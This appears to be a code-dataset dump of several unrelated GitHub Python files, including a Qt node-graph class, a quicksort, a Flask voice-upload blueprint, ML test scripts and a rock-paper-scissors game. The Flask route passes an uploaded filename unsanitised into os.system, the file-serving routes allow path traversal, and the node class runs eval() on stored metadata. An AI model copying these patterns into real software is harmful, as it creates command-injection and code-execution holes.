NodeTypes(object):\n def __init__(self, nodeClass):\n self.nodeClass = nodeClass\n self.parentNodeClass = [n for n in nodeClass.__mro__ if hasattr(n, 'nodeType')]\n self.parentNodeTypes = [n.nodeType for n in self.parentNodeClass]\n\n def isSubType(self, nodeType):\n return nodeType in self.parentNodeTypes\n\n\nclass Node(QtCore.QObject):\n parameterValueChanged = QtCore.Signal(object)\n parameterAdded = QtCore.Signal(object)\n parameterRemoved = QtCore.Signal(object)\n parameterPagesCleared = QtCore.Signal()\n\n _nodeTypes = {}\n\n nodeType = 'Node'\n nodeItemType = 'NodeItem'\n nodeGroup = 'Other'\n\n fillNormalColor = (50, 60, 70)\n fillHighlightColor = (230, 230, 100)\n borderNormalColor = (50, 60, 70)\n borderHighlightColor = (180, 180, 250)\n\n _expressionMap = {}\n\n @classmethod\n def convertColorToFloat(cls, color):\n return [i / 255.0 for i in color]\n\n @classmethod\n def convertColorTo255(cls, color):\n return [max(min(i * 255.0, 255.0), 0) for i in color]\n\n @classmethod\n def registerExpressionString(cls, string, object):\n cls._expressionMap[string] = object\n\n @classmethod\n def registerNode(cls, nodeObjectClass):\n nodeType = nodeObjectClass.nodeType\n cls._nodeTypes[nodeType] = nodeObjectClass\n nodeObjectClass.parameterDefaults = {}\n\n @classmethod\n def setParamDefault(cls, nodeType, paramName, value):\n nodeClass = cls._nodeTypes.get(nodeType)\n if nodeClass is not None:\n nodeClass.setParameterDefault(paramName, value)\n\n @classmethod\n def getAllNodeClassNames(cls):\n return list(cls._nodeTypes.keys())\n\n @classmethod\n def getAllNodeClass(cls):\n return list(cls._nodeTypes.values())\n\n @classmethod\n def setParameterDefault(cls, parameterName, value):\n cls.parameterDefaults.update({parameterName: value})\n\n 
@classmethod\n def getNodeClass(cls, nodeType):\n return cls._nodeTypes.get(nodeType, cls)\n\n @classmethod\n def getNodesByGroup(cls):\n result = {}\n for k, v in cls._nodeTypes.items():\n if v.nodeGroup not in result:\n result[v.nodeGroup] = []\n result[v.nodeGroup].append(v)\n return result\n\n @classmethod\n def Class(cls):\n return cls.nodeType\n\n @classmethod\n def NodeTypes(cls):\n return NodeTypes(cls)\n\n def __init__(self, item=None, name=''):\n super(Node, self).__init__()\n\n self.item = item\n self._name = name\n self._parameters = {}\n self._parametersName = []\n self._updateToDated = False\n self._metadata = {}\n self._defaultMetadata = {}\n\n self._beforeInitParameters()\n self._initParameters()\n self._initDefaults()\n self._setTags()\n\n def _beforeInitParameters(self):\n pass\n\n def _initParameters(self):\n self._parameters = {\n 'name': StringParameter(name='name', default=self._name, parent=self, builtIn=True, hints={'tab': 'None'}),\n 'label': TextParameter(name='label', default='', parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'labelFontSize': IntParameter(name='labelFontSize', default=10, parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'x': FloatParameter(name='x', default=None, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'y': FloatParameter(name='y', default=None, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'locked': BoolParameter(name='locked', default=False, parent=self, builtIn=True, visible=False, hints={'tab': 'Node'}),\n 'disable': BoolParameter(name='disable', default=0, parent=self, builtIn=True, hints={'tab': 'Node'}),\n 'fillColor': Color4fParameter(name='fillColor', parent=self, builtIn=True, hints={'showEditor': 'False', 'tab': 'None'}, default=self.convertColorToFloat(self.fillNormalColor)),\n 'borderColor': Color4fParameter(name='borderColor', parent=self, builtIn=True, hints={'showEditor': 'False', 'tab': 'None'}, default=self.convertColorToFloat(self.borderNormalColor)),\n }\n self._parametersName = list(self._parameters.keys())\n self._parametersName.sort()\n\n def _initDefaults(self):\n for name in self.parameterDefaults.keys():\n defaultValue = self.parameterDefaults.get(name)\n self.parameter(name).setValueQuietly(defaultValue, override=False)\n self.parameter(name).setInheritValue(defaultValue)\n\n def _setTags(self):\n pass\n\n def parameter(self, parameterName):\n return self._parameters.get(parameterName)\n\n def hasParameter(self, name):\n return name in self._parameters\n\n def parameters(self):\n return [self._parameters.get(n) for n in self._parametersName]\n\n def name(self):\n return self.parameter('name').getValue()\n\n def hasProperty(self, name):\n if name in ['x', 'y']:\n return True\n return False\n\n def getProperty(self, name):\n if name == 'x':\n return self.item.scenePos().x()\n if name == 'y':\n return self.item.scenePos().y()\n\n def setProperty(self, name, value):\n if name == 'x':\n self.item.setX(value)\n elif name == 'y':\n self.item.setY(value)\n\n def _paramterValueChanged(self, parameter):\n logger.debug('{}, {}'.format(parameter.name(), parameter.getValue()))\n self.parameterValueChanged.emit(parameter)\n self._whenParamterValueChanged(parameter)\n GraphState.executeCallbacks(\n 'parameterValueChanged',\n node=self, parameter=parameter\n )\n\n def _whenParamterValueChanged(self, parameter):\n if parameter.name() == 'name':\n self.item.scene()._afterNodeNameChanged(self.item)\n\n def addParameter(self, parameterName, parameterType, default=None, 
**kwargs):\n \"\"\"\n :param parameterName:\n :param parameterType:\n :param default:\n :param custom:\n :return:\n \"\"\"\n\n if self.hasParameter(parameterName):\n return self.parameter(parameterName)\n\n parameterClass = Parameter.getParameter(parameterType)\n if parameterClass is None:\n from pyNodeGraph.ui.utils.log import LogWindow\n message = 'Un-Support Parameter Type in addParameter! {}: {}'.format(parameterName, parameterType)\n LogWindow.warning(message)\n logger.warning(message)\n return\n\n label = kwargs.get('label', '')\n\n if label == '':\n label = parameterName\n order = None\n if parameterName.startswith(INPUT_ATTRIBUTE_PREFIX):\n label = parameterName.replace(INPUT_ATTRIBUTE_PREFIX, '')\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX):\n label = parameterName.replace(OUTPUT_ATTRIBUTE_PREFIX, '')\n kwargs['label'] = label\n\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX) and 'visible' not in kwargs:\n kwargs['visible'] = False\n\n parameter = parameterClass(\n parameterName,\n parent=self,\n default=default,\n **kwargs\n )\n self._parameters.update({parameterName: parameter})\n self._parametersName.append(parameterName)\n\n self.parameterAdded.emit(parameter)\n\n if parameterName.startswith(INPUT_ATTRIBUTE_PREFIX):\n self.item.addParameterInputPort(\n parameterName, label=label,\n dataType=parameter.__class__\n )\n if parameterName.startswith(OUTPUT_ATTRIBUTE_PREFIX):\n self.item.addParameterOutputPort(\n parameterName, label=label,\n dataType=parameter.__class__\n )\n\n return parameter\n\n def removeParameter(self, parameterName):\n if parameterName in self._parameters:\n # parameter = self.parameter(parameterName)\n self._parameters.pop(parameterName)\n self._parametersName.remove(parameterName)\n self.parameterRemoved.emit(parameterName)\n\n self.item.removeParameterPort(parameterName)\n\n def clearPages(self):\n self.parameterPagesCleared.emit()\n\n def isNodeLocked(self):\n return self.parameter('locked').getValue()\n\n def hasMetadatas(self):\n return self._metadata != {}\n\n def hasMetadata(self, key):\n return key in self._metadata\n\n def setMetadata(self, key, value):\n self._metadata[key] = str(value)\n\n def getMetadataValue(self, key, default=None):\n strValue = self._metadata.get(key, default)\n try:\n value = eval(strValue)\n except:\n value = strValue\n return value\n\n def getMetadataKeys(self):\n return list(self._metadata.keys())\n\n def getMetadatas(self):\n return self._metadata\n\n def getDefaultMetadatas(self):\n return self._defaultMetadata\n\n def getMetadatasAsString(self):\n return json.dumps(self._metadata, indent=4)\n\n def getActions(self):\n actions = [\n ]\n return actions\n\n\nclass DotNode(Node):\n nodeType = 'Dot'\n nodeItemType = 'DotItem'\n\n\nclass FlowDotNode(DotNode):\n nodeType = 'DotF'\n nodeItemType = 'FlowDotItem'\n\n\nclass ParamDotNode(DotNode):\n nodeType = 'DotP'\n nodeItemType = 'ParameterDotItem'\n\n\nclass BackdropNode(Node):\n nodeType = 'Backdrop'\n nodeItemType = 'BackdropItem'\n fillNormalColor = (50, 60, 70, 100)\n borderNormalColor = (50, 60, 70, 100)\n\n @classmethod\n def convertColorTo255(cls, color):\n color = super(BackdropNode, cls).convertColorTo255(color)\n if len(color) == 4:\n color[3] = 100\n return color\n\n def _initParameters(self):\n super(BackdropNode, self)._initParameters()\n\n self.addParameter('width', 'float', builtIn=True, visible=False, hints={'tab': 'Node'})\n self.addParameter('height', 'float', builtIn=True, visible=False, hints={'tab': 'Node'})\n\n def hasProperty(self, 
name):\n if name in ['width', 'height']:\n return True\n return super(BackdropNode, self).hasProperty(name)\n\n def getProperty(self, name):\n if name == 'width':\n return self.item.w\n if name == 'height':\n return self.item.h\n return super(BackdropNode, self).getProperty(name)\n\n def setProperty(self, name, value):\n super(BackdropNode, self).setProperty(name, value)\n if name == 'width':\n self.item.w = value\n self.item.setSizerPos()\n elif name == 'height':\n self.item.h = value\n self.item.setSizerPos()\n\n\nimport os\nNode.registerExpressionString('os', os)\n\nNode.registerNode(DotNode)\nNode.registerNode(FlowDotNode)\nNode.registerNode(ParamDotNode)\nNode.registerNode(BackdropNode)\n\n","repo_name":"1xinghuan/pyNodeGraph","sub_path":"lib/python/pyNodeGraph/core/node/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":11457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73999029850","text":"# Created by Jello on 2017. 6. 29.\nimport time\n\ndef qsort(A):\n if len(A) <= 1:\n return A\n\n pivot = A[0]\n (less, equal, greater) = ([], [A[0]], [])\n\n for x in A[1:]:\n if x < pivot:\n less.append(x)\n elif x == pivot:\n equal.append(x)\n else:\n greater.append(x)\n\n return qsort(less) + equal + qsort(greater)\n\n# test\n\nprint(qsort([1,4,2,6,10,38,12]))\nprint(qsort([9,18,23,53,77]))\nprint(qsort([88,1,4,0,43]))\nprint(qsort([100,3,78,6,223,1]))\n","repo_name":"guswnsxodlf/algorithm","sub_path":"python/ds/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31593956627","text":"from flask import Blueprint, request, send_file, jsonify\r\nfrom settings import MONGO_DB, IMAGE_PATH, MUSIC_PATH, CHAT_PATH, RET\r\nimport os\r\nfrom bson import ObjectId\r\nfrom uuid import uuid4\r\nfrom baidu_aip.baidu_asr_sync import audio2text, my_nlp_lowb\r\n\r\nget_any = Blueprint(\"get_any\", __name__)\r\n\r\n\r\n@get_any.route(\"/get_music/<filename>\")\r\ndef get_music(filename):\r\n filename = os.path.join(MUSIC_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/get_chat/<filename>\")\r\ndef get_chat(filename):\r\n filename = os.path.join(CHAT_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/get_image/<filename>\")\r\ndef get_image(filename):\r\n filename = os.path.join(IMAGE_PATH, filename)\r\n return send_file(filename)\r\n\r\n\r\n@get_any.route(\"/uploder\", methods=[\"POST\"])\r\ndef uploder():\r\n '''\r\n Upload and save a chat record\r\n :return:\r\n '''\r\n record_file = request.files.get(\"record\")\r\n chat_window = request.form.get(\"chat_window\")\r\n user_id = request.form.get(\"user_id\")\r\n record_path = os.path.join(CHAT_PATH, record_file.filename)\r\n record_file.save(record_path)\r\n os.system(f\"ffmpeg -i {record_path} {record_path}.mp3\")\r\n # chat = MONGO_DB.chat.find_one({\"_id\": ObjectId(chat_window)})\r\n sender_msg = {\r\n \"sender\": user_id,\r\n \"msg\": record_file.filename + \".mp3\"\r\n }\r\n MONGO_DB.chat.update_one({\"_id\": ObjectId(chat_window)}, {\"$push\": {\"chat_list\": sender_msg}})\r\n RET[\"code\"] = 0\r\n RET[\"msg\"] = \"\"\r\n RET[\"data\"] = {}\r\n\r\n return jsonify(RET)\r\n\r\n\r\n@get_any.route(\"/toy_ai\", methods=[\"POST\"])\r\ndef toy_ai():\r\n '''\r\n Voice AI on-demand\r\n :return:\r\n '''\r\n file_name = f\"{uuid4()}.wav\"\r\n record_file = request.files.get(\"record\")\r\n sender = request.form.get(\"sender\")\r\n # to_user = request.form.get('to_user')\r\n record_path = os.path.join(CHAT_PATH, file_name)\r\n record_file.save(record_path)\r\n text = audio2text(record_path)\r\n print(text)\r\n ret_dict = my_nlp_lowb(text, sender)\r\n return jsonify(ret_dict)\r\n","repo_name":"cs4224485/Toy","sub_path":"serv/get_anything.py","file_name":"get_anything.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71738779610","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\nA Vexflower\n\n\"\"\"\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Specials.Muzikers.Muziker\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Classer\"\nSYS.setSubModule(globals())\n#\n\n#\nfrom music21 import vexflow\n#\n\n#\n@DecorationClass()\nclass VexflowerClass(BaseClass):\n\t\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t]\n\n\tdef default_init(self,\n\t\t\t\t\t\t_VexflowedMusic21Str=\"\",\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent __init__ method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\tdef do_vexflow(self):\n\n\t\t#first muzik\n\t\tself.muzik()\n\n\t\t#vexflow now\n\t\tself.VexflowedMusic21Vexflow=vexflow.fromObject(\n\t\t\tself.MuzikedMusic21Converter)\n\n#\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Specials/Muzikers/Vexflower/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4415703030","text":"from loss import DiceLoss, to_one_hot\nfrom model import init_U_Net\nfrom dataset_conversion import BraTSDataset, data_loader\nfrom utils import load_config, load_ckp\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch \nimport os\nfrom tqdm import tqdm \nimport numpy as np\nfrom utils import crop_index_gen, image_rebuild, image_crop, normalize, inference_output\nimport SimpleITK as sitk\nimport nibabel as nib \nfrom metrics import dice_coe\nimport matplotlib.pyplot as plt \nimport seaborn as sns\nimport time\nimport argparse\n\n\ndef validation(trained_net, \n val_set, \n criterion, \n device,\n batch_size):\n\n '''\n used for evaluation during the training phase\n\n params trained_net: trained U-net\n params val_set: validation dataset \n params criterion: loss function\n params device: cpu or gpu\n '''\n\n n_val = len(val_set)\n val_loader = val_set.load()\n\n tot = 0 \n acc = 0\n\n with tqdm(total=n_val, desc='Validation round', unit='patch', leave=False) as pbar:\n with torch.no_grad():\n for i, sample in enumerate(val_loader):\n images, segs = sample['image'].to(device=device), sample['seg'].to(device=device)\n\n preds = trained_net(images)\n val_loss = criterion(preds, segs)\n dice_score = dice_coe(preds.detach().cpu(), segs.detach().cpu())\n\n tot += val_loss.detach().item() \n acc += dice_score['avg']\n\n pbar.set_postfix(**{'validation loss (images)': val_loss.detach().item(), 'val_acc':dice_score['avg']})\n pbar.update(images.shape[0])\n\n return tot/(np.ceil(n_val/batch_size)), acc/(np.ceil(n_val/batch_size))\n\n\ndef predict(trained_net, \n model_name,\n test_patient, \n root,\n crop_size=98, \n overlap_size=0, \n save_mask=True):\n\n ''' used for predicting image segmentation after training '''\n\n # load test image\n patient_name = os.path.basename(test_patient)\n modality_dir = 
os.listdir(test_patient)\n image = []\n for modality in modality_dir:\n if modality != patient_name + '_seg.nii.gz':\n path = os.path.join(test_patient, modality)\n img = sitk.GetArrayFromImage(sitk.ReadImage(path))\n image.append(img)\n else:\n path = os.path.join(test_patient, modality)\n seg = sitk.ReadImage(path)\n seg_arr = sitk.GetArrayFromImage(seg)\n\n image = np.stack(image) # C*D*H*W\n\n # model inference\n trained_net.eval()\n image_shape = image.shape[-3:]\n crop_info = crop_index_gen(image_shape=image_shape, crop_size=crop_size, overlap_size=overlap_size)\n\n image_patches = image_crop(image, crop_info, norm=True, ToTensor=True)\n\n cropped_image_list = np.zeros_like(image_patches.cpu().numpy())\n\n with torch.no_grad():\n with tqdm(total=len(cropped_image_list), desc='inference test image', unit='patch') as pbar:\n for i, image in enumerate(image_patches):\n image = image.unsqueeze(dim=0)\n preds = trained_net(image)\n\n cropped_image_list[i, ...] = preds.squeeze(0).detach().cpu().numpy()\n pbar.update(1)\n\n crop_index = crop_info['index_array']\n rebuild_four_channels = image_rebuild(crop_index, cropped_image_list)\n inferenced_mask = inference_output(rebuild_four_channels) \n\n # calcualte DSC\n target = torch.from_numpy(seg_arr).unsqueeze(0)\n pred = torch.from_numpy(inferenced_mask).unsqueeze(0)\n pred = to_one_hot(pred)\n dsc = dice_coe(pred, target)\n print('DSC by label of this image is: ', dsc)\n\n # plot predicted segmentation\n plt.figure(figsize=(20, 10))\n ground_truth = seg_arr[image_shape[0]//2]\n predicted = inferenced_mask[image_shape[0]//2]\n image_list = [ground_truth, predicted]\n\n subtitles = ['ground truth', 'predicted']\n plt.subplots_adjust(wspace=0.3)\n\n for i in range(1,3):\n ax = plt.subplot(1,2,i)\n ax.set_title(subtitles[i-1])\n sns.heatmap(image_list[i-1], vmin=0, vmax=4, xticklabels=False, yticklabels=False, square=True, cmap='coolwarm', cbar=True)\n\n # save prediction\n save_path = os.path.join(root, 'prediction_results', patient_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n mask = sitk.GetImageFromArray(inferenced_mask.astype(np.int16))\n if save_mask:\n plt.savefig(os.path.join(save_path, '{}_2D_prediction_{}.png'.format(patient_name, model_name)))\n\n mask.CopyInformation(seg)\n sitk.WriteImage(mask, os.path.join(save_path, '{}_2D_prediction_{}.nii.gz'.format(patient_name, model_name)))\n\n\ndef predict_use(args):\n\n model_name = args.model_name\n patient_path = args.patient_path\n\n config_file = 'config.yaml'\n cfg = load_config(config_file)\n input_modalites = int(cfg['PARAMETERS']['input_modalites'])\n output_channels = int(cfg['PARAMETERS']['output_channels'])\n base_channels = int(cfg['PARAMETERS']['base_channels'])\n patience = int(cfg['PARAMETERS']['patience'])\n\n ROOT = cfg['PATH']['root'] \n best_dir = cfg['PATH']['best_model_path']\n best_model_dir = os.path.join(ROOT, best_dir)\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\n # load best trained model\n net = init_U_Net(input_modalites, output_channels, base_channels)\n net.to(device)\n \n optimizer = optim.Adam(net.parameters())\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, verbose=True, patience=patience)\n ckp_path = os.path.join(best_model_dir, model_name + '_best_model.pth.tar')\n net, _, _, _, _, _ = load_ckp(ckp_path, net, optimizer, scheduler)\n\n # predict\n predict(net, model_name, patient_path, ROOT, save_mask=True)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-name', 
'--model_name', default='baseline_local', type=str, help='which model to be used')\n parser.add_argument('-p', '--patient_path', type=str, help='patient dir')\n args = parser.parse_args()\n\n predict_use(args)\n\nif __name__ == '__main__':\n \n main()\n \n\n \n\n\n\n \n \n\n \n \n\n\n","repo_name":"TUDelftHao/3D-U-Net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25998958294","text":"from adn.utils import Logger\nfrom adn.tester import Tester\nfrom adn.models import ADNTest\nfrom skimage.measure import compare_ssim as ssim\nfrom skimage.measure import compare_psnr as psnr\n\n\nclass ADNTester(Tester):\n def __init__(self, **params):\n super(ADNTester, self).__init__(**params)\n \n def get_image(self, data):\n data_opts = self.opts.dataset\n dataset_type = data_opts[\"dataset_type\"]\n if dataset_type == \"deep_lesion\":\n if data_opts[dataset_type][\"load_mask\"]:\n return data['lq_image'], data['hq_image'], data[\"data_name\"], data[\"mask\"]\n else:\n return data['lq_image'], data['hq_image'], data[\"data_name\"]\n elif dataset_type == \"spineweb\":\n return data['a'], data['b'], data[\"data_name\"]\n elif dataset_type == \"nature_image\":\n return data['artifact'], data['no_artifact'], data[\"data_name\"]\n\n def get_metric(self, metric):\n def measure(x, y):\n x = self.dataset.to_numpy(x, False)\n y = self.dataset.to_numpy(y, False)\n x = x * 0.5 + 0.5\n y = y * 0.5 + 0.5\n\n return metric(x, y, data_range=1.0)\n return measure\n\n def get_pairs(self):\n if hasattr(self.model, 'mask'):\n mask = self.model.mask\n img_low = self.model.img_low * mask\n img_high = self.model.img_high * mask\n pred_lh = self.model.pred_lh * mask\n else:\n img_low = self.model.img_low\n img_high = self.model.img_high\n pred_lh = self.model.pred_lh\n\n return [\n (\"before\", (img_low, img_high)), \n (\"after\", (pred_lh, img_high))], self.model.name\n\n def get_visuals(self, n=8):\n lookup = [\n (\"l\", \"img_low\"), (\"ll\", \"pred_ll\"), (\"lh\", \"pred_lh\"),\n (\"h\", \"img_high\"), (\"hl\", \"pred_hl\"), (\"hh\", \"pred_hh\")]\n visual_window = self.opts.visual_window\n \n def visual_func(x):\n x = x * 0.5 + 0.5\n x[x < visual_window[0]] = visual_window[0]\n x[x > visual_window[1]] = visual_window[1]\n x = (x - visual_window[0]) / (visual_window[1] - visual_window[0])\n return x\n\n return self.model._get_visuals(lookup, n, visual_func, False)\n\n def get_logger(self, opts):\n self.logger = Logger(self.run_dir, self.epoch, self.run_name)\n self.logger.add_iter_visual_log(self.get_visuals, 1, \"test_visuals\")\n self.logger.add_metric_log(self.get_pairs,\n ((\"ssim\", self.get_metric(ssim)), (\"psnr\", self.get_metric(psnr))), opts.metrics_step)\n\n return self.logger\n\n def evaluate(self, model, data):\n model.evaluate(*data[:3])\n if len(data) == 4:\n mask = 1 - data[3].to(model.img_high)\n model.mask = mask\n\nif __name__ == \"__main__\":\n tester = ADNTester(\n name=\"adn\", model_class=ADNTest,\n description=\"Test an artifact disentanglement network\")\n tester.run()\n","repo_name":"liaohaofu/adn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"32"} +{"seq_id":"26915320149","text":"'''\nCreated on Oct 6, 2015\n\n@author: Evan\n'''\nimport random\n#random number import\ncscore=0\npscore=0\n#score start\nwhile cscore<5 and 
pscore<5: #Loop until computer or player score reaches 5\r\n comp=random.randint(1,3) #Random number range\r\n choice=input(\"Please choose 'r'ock, 'p'aper, or 's'cissors\\n\") #Choice\r\n if comp==1: #Computer choice rock\r\n if choice==\"r\":\r\n print(\"Draw. You chose rock. The computer chose rock\\n\")#Player choice rock\r\n elif choice==\"p\":\r\n print(\"You won. You chose paper. The computer chose rock\\n\")#Player choice paper\r\n pscore+=1 #Adds score to player\r\n elif choice==\"s\":\r\n print(\"You lost. You chose scissors. The computer chose rock\\n\")#Player choice scissors\r\n cscore+=1 #Adds score to computer\r\n else:\r\n print(\"ERROR! Please choose again.\\n\")\r\n if comp==2: #Computer choice paper\r\n if choice==\"r\":\r\n print(\"You lost. You chose rock. Computer chose paper.\\n\")#Player choice rock\r\n cscore+=1\r\n elif choice==\"p\":\r\n print(\"Draw. You chose paper. Computer chose paper.\\n\")#Player choice paper\r\n elif choice==\"s\":\r\n print(\"You won. You chose scissors. Computer chose paper.\\n\")#Player choice scissors\r\n pscore+=1\r\n else:\r\n print(\"ERROR! Please choose again.\\n\")\r\n if comp==3: #Computer choice scissors\r\n if choice==\"r\":\r\n print(\"You won. You chose rock. Computer chose scissors.\\n\")#Player choice rock\r\n pscore+=1\r\n elif choice==\"p\":\r\n print(\"You lost. You chose paper. Computer chose scissors.\\n\")#Player choice paper\r\n cscore+=1\r\n elif choice==\"s\":\r\n print(\"Draw. You chose scissors. Computer chose scissors.\\n\")#Player choice scissors\r\n else:\r\n print(\"ERROR! Please choose again.\\n\")\r\n print(\"The score is now:\\n You: \" +str(pscore)+\"\\nComputer: \" +str(cscore)+ '\\n')#Score after each round\r\nif cscore==5:\r\n print(\"The computer won!\")\r\n#Checks who won and prints it\r\nelif pscore==5:\r\n print(\"You won!\")","repo_name":"Demoleas715/PythonWorkspace","sub_path":"Unit2WhileLoops/RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12751552858","text":"\"\"\"Handle functions to the generic novu.\"\"\"\nimport json\nimport logging\nfrom typing import Any\n\nimport requests\nfrom notification_lib.exceptions import NotificationException\n\n\nlogging.getLogger().setLevel(logging.INFO)\n\n\nclass GenericNovuManager:\n \"\"\"Novu utils, template creation/update.\"\"\"\n\n api_url_generic_novu: str | None\n admin_email_for_generic_novu: str | None\n admin_password_for_generic_novu: str | None\n\n @classmethod\n def get_novu_jwt_bearer_token(cls) -> str:\n \"\"\"Get jwt bearer token.\"\"\"\n login_response = requests.post(\n f\"{cls.api_url_generic_novu}/v1/auth/login\",\n headers={\"Content-Type\": \"application/json\"},\n data=json.dumps(\n {\n \"email\": cls.admin_email_for_generic_novu,\n \"password\": cls.admin_password_for_generic_novu,\n }\n ),\n timeout=10,\n )\n\n if login_response.status_code // 100 == 2:\n return login_response.json()[\"data\"][\"token\"]\n\n logging.error(f\"status code: {login_response.status_code}\")\n logging.error(f\"response : {login_response.json()}\")\n raise NotificationException(\"Error while authenticating to the generic novu\")\n\n @classmethod\n def get_generic_novu_templates(cls) -> list[dict[str, Any]]:\n \"\"\"Get templates from the generic novu.\"\"\"\n response = requests.get(\n url=f\"{cls.api_url_generic_novu}/v1/notification-templates\",\n headers={\"Authorization\": f\"Bearer {cls.get_novu_jwt_bearer_token()}\"},\n timeout=5,\n )\n\n if response.status_code // 100 == 2:\n return response.json()[\"data\"]\n\n logging.error(f\"status code: {response.status_code}\")\n logging.error(f\"response : {response.json()}\")\n raise NotificationException(\"Error while importing the templates\")\n\n @staticmethod\n def format_filter_to_create_update(filter_from_generic: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Take useful fields for the filter.\"\"\"\n\n return {\n key: filter_from_generic[key]\n for key in filter_from_generic.keys()\n if key in {\"children\", \"isNegated\", \"type\", \"value\"}\n }\n\n @staticmethod\n def format_steps_to_create_update(\n steps_from_generic: list[dict[str, Any]]\n ) -> list[dict[str, Any]]:\n \"\"\"Format the steps we get from the generic novu so that we can use them in creation and update.\"\"\"\n logging.info(f\"generic steps: {steps_from_generic}\")\n steps = []\n\n for step in steps_from_generic:\n formated_template = {\n \"type\": step[\"template\"][\"type\"],\n \"active\": step[\"template\"][\"active\"],\n \"variables\": step[\"template\"][\"variables\"],\n \"content\": step[\"template\"][\"content\"],\n }\n if step[\"template\"][\"type\"] == \"push\":\n # Push notifications have \"title\" as their content key\n formated_template[\"title\"] = step[\"template\"][\"title\"]\n\n # If customHtml is true, it means we are passing a custom html\n if step[\"template\"][\"type\"] == \"email\":\n if \"contentType\" in step[\"template\"]:\n # Subject is the title of the email\n formated_template[\"subject\"] = step[\"template\"][\"subject\"]\n # Content is the body of the email\n formated_template[\"content\"] = step[\"template\"][\"content\"]\n # contentType = customHtml indicates that the content is a custom html\n formated_template[\"contentType\"] = \"customHtml\"\n else:\n # Subject is the title of the email\n formated_template[\"subject\"] = step[\"template\"][\"subject\"]\n\n steps.append(\n {\n \"active\": step[\"active\"],\n \"filters\": [\n GenericNovuManager.format_filter_to_create_update(step_filter)\n for step_filter in step[\"filters\"]\n ],\n \"template\": formated_template,\n }\n )\n\n logging.info(f\"formatted steps: {steps}\")\n return steps\n\n @classmethod\n def get_generic_template_by_id(cls, template_id: str) -> dict[str, Any]:\n \"\"\"Get a generic template by providing its id.\"\"\"\n response = requests.get(\n url=f\"{cls.api_url_generic_novu}/v1/notification-templates/{template_id}\",\n headers={\"Authorization\": f\"Bearer {cls.get_novu_jwt_bearer_token()}\"},\n timeout=5,\n )\n\n if response.status_code == 200:\n result = response.json()[\"data\"]\n return {\n \"template_name\": result[\"name\"],\n \"id\": result[\"_id\"],\n \"steps\": cls.format_steps_to_create_update(result[\"steps\"]),\n }\n\n logging.error(f\"status code: {response.status_code}\")\n logging.error(f\"response : {response.json()}\")\n raise NotificationException(\"Error while importing the template\")\n","repo_name":"myenergymanager/notification-myem-lib","sub_path":"notification_lib/novu_manager/generic_novu_manager.py","file_name":"generic_novu_manager.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24396194328","text":"import os\nimport json\nfrom colorama import Fore\n\n\nclass Player:\n def __init__(self, name, record):\n self.name = name\n self.record = record\n\n\nclass Data:\n @staticmethod\n def get_records():\n try:\n with open(\"data/records.json\") as file:\n data = json.load(file)\n file.close()\n return data\n except:\n Data.create_record_file()\n return Data.get_records()\n\n @staticmethod\n def create_record_file():\n if not os.path.exists(\"data\"): os.mkdir(\"data\")\n file = open(\"data/records.json\", \"w\")\n file.write(\"[]\")\n file.close()\n\n @staticmethod\n def check_name(name):\n while len(name) < 3 or len(name) > 15:\n name = input(\"Please write a valid name: \")\n\n return name\n\n @staticmethod\n def get_player(name):\n data = Data.get_records()\n\n for rec in data:\n if rec[\"name\"] == name: return Player(rec[\"name\"], rec[\"record\"])\n\n return False\n\n @staticmethod\n def create_player():\n player_name = Data.check_name(input(\"What's your name fellow player?: \"))\n player_object = Data.get_player(player_name)\n if not player_object: return Player(player_name, \"No record yet.\")\n else: return player_object\n\n @staticmethod\n def write_record(player):\n data = Data.get_records()\n file = open(\"data/records.json\", \"w\")\n exists = False\n\n for rec in data:\n if rec[\"name\"] == player.name:\n exists = True\n if rec[\"record\"] < player.record:\n rec[\"record\"] = player.record\n break\n\n if not exists: data.append({\n 